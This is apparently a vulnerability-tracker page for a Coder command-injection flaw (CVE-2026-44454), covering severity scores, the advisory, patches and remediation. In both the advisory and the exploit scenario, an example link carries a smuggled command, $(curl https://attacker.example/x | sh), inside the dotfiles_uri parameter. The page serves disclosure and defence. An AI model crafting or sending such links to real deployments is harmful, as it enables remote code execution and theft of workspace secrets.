Skip to main content

Coder CVE-2026-44454

| EUVDEUVD-2026-42087 HIGH
OS Command Injection (CWE-78)
2026-07-02 https://github.com/coder/coder GHSA-m3cr-vc2j-pm27
8.8
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
8.8 HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

The amplified mode=auto path needs no attacker privileges (PR:N) but requires the victim to click a crafted link (UI:R); full workspace RCE yields C:H/I:H/A:H with scope unchanged.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

9
Analysis Updated
Jul 08, 2026 - 19:59 vuln.today
v3 (cvss_changed)
Source Code Evidence Fetched
Jul 08, 2026 - 19:58 vuln.today
Analysis Updated
Jul 08, 2026 - 19:58 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jul 08, 2026 - 19:52 vuln.today
cvss_changed
CVSS changed
Jul 08, 2026 - 19:52 NVD
8.1 (HIGH) 8.8 (HIGH)
Re-analysis Queued
Jul 08, 2026 - 19:52 vuln.today
cvss_changed
CVSS changed
Jul 08, 2026 - 19:52 NVD
8.1 (HIGH) 8.8 (HIGH)
Analysis Generated
Jul 02, 2026 - 18:30 vuln.today
CVE Published
Jul 02, 2026 - 18:14 github-advisory
HIGH 8.1

DescriptionNVD

Command injection via dotfiles URI parameter combined with workspace auto-creation

Summary

The dotfiles registry module passed unsanitized user input to shell commands, allowing arbitrary code execution inside a provisioned workspace. Any user who supplied a crafted dotfiles_uri value (for example, one containing shell command substitution such as $(...)) could achieve command execution in their own workspace. The Create Workspace page's mode=auto deep links amplified this into a one-click attack: an attacker could craft a URL that prefilled param.dotfiles_uri and silently provisioned a workspace with the attacker-controlled value, with no explicit user confirmation.

Details

Command injection in the dotfiles module (root cause)

The dotfiles module interpolated the user-provided dotfiles_uri value directly into a shell script and executed it without input validation. Because the value was expanded by the shell, payloads using command substitution ($(...)), command separators (;, |, &&), or backticks were interpreted before the coder dotfiles CLI was invoked. The Coder CLI itself uses exec.CommandContext() with an argument array and is not vulnerable; the injection occurred earlier, during shell expansion inside the module. As a result, a user who entered a crafted dotfiles_uri obtained arbitrary code execution in their workspace, even without mode=auto.

Auto-creation amplification (mode=auto)

The Create Workspace page supported a mode=auto query parameter that, combined with param.* URL parameters, automatically created a workspace on page load without displaying a confirmation prompt. An attacker could craft a malicious URL pointing to a victim's Coder deployment and set arbitrary template parameter values (for example, param.dotfiles_uri). When an authenticated user clicked the link, the workspace was created immediately with the attacker-supplied parameters, turning the command injection above into a one-click, no-consent attack.

Example URL:

https://<deployment>/templates/<template>/workspace?mode=auto&param.dotfiles_uri=foo$(curl https://attacker.example/x | sh).com

Impact

Arbitrary code execution inside the victim's workspace. Depending on the workspace's privileges, this may expose Git credentials, secrets, and workspace files, and can provide a foothold for lateral movement. With mode=auto, exploitation required only that an authenticated user click an attacker-supplied link to a template that uses the dotfiles module.

Patches

coder/registry (primary fix)

Input validation was added to the dotfiles module to reject URIs and usernames containing special characters, and the unsafe eval/sh -c usage was removed. This eliminates the command injection at its source.

  • https://github.com/coder/registry/pull/703

coder/coder (defense-in-depth)

A consent dialog was added that displays all prefilled param.* values and blocks creation until the user explicitly clicks Confirm and Create. This removes the mode=auto one-click amplification vector.

  • Fix commit: https://github.com/coder/coder/commit/60e3ab7632f42415d283b9fd5622ee53a4639ceb (PR #22011)
  • Patched releases:
  • v2.29.7 (ESR)
  • v2.30.2 (mainline)

Recognition

We'd like to thank Aviv Donenfeld for responsibly disclosing this issue in accordance with https://coder.com/security/policy

AnalysisAI

Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry dotfiles module, which interpolated the user-controlled dotfiles_uri into a shell script without validation. Combined with the Create Workspace page's mode=auto deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied dotfiles_uri (e.g. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft malicious mode=auto workspace URL
Delivery
Send link to authenticated victim
Exploit
Victim clicks, workspace auto-created
Execution
Shell expands dotfiles_uri payload
Persist
Execute arbitrary code in workspace
Impact
Harvest secrets and Git credentials

Vulnerability AssessmentAI

Exploitation Exploitation requires the target Coder deployment to use a template that includes the vulnerable coder/registry dotfiles module and exposes the `dotfiles_uri` parameter, running on a pre-patch server (< 2.29.7 or 2.30.0-2.30.1). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The signals are broadly consistent but nuanced. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a URL to a victim's Coder deployment targeting a template that uses the dotfiles module, e.g. `https://deploy/templates/T/workspace?mode=auto&param.dotfiles_uri=foo$(curl https://attacker.example/x | sh).com`, and sends it to an authenticated Coder user. …
Remediation Vendor-released patch: upgrade Coder to v2.29.7 (ESR) or v2.30.2 (mainline), which add a consent dialog that displays all prefilled `param.*` values and blocks creation until the user clicks Confirm and Create, removing the `mode=auto` one-click vector (commit 60e3ab7632f42415d283b9fd5622ee53a4639ceb, PR https://github.com/coder/coder/pull/22011). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: identify all Coder instances and disable workspace auto-provisioning (mode=auto) or validate all dotfiles_uri parameters to block shell metacharacters; notify developers to avoid clicking unfamiliar Coder workspace links. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-44454 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy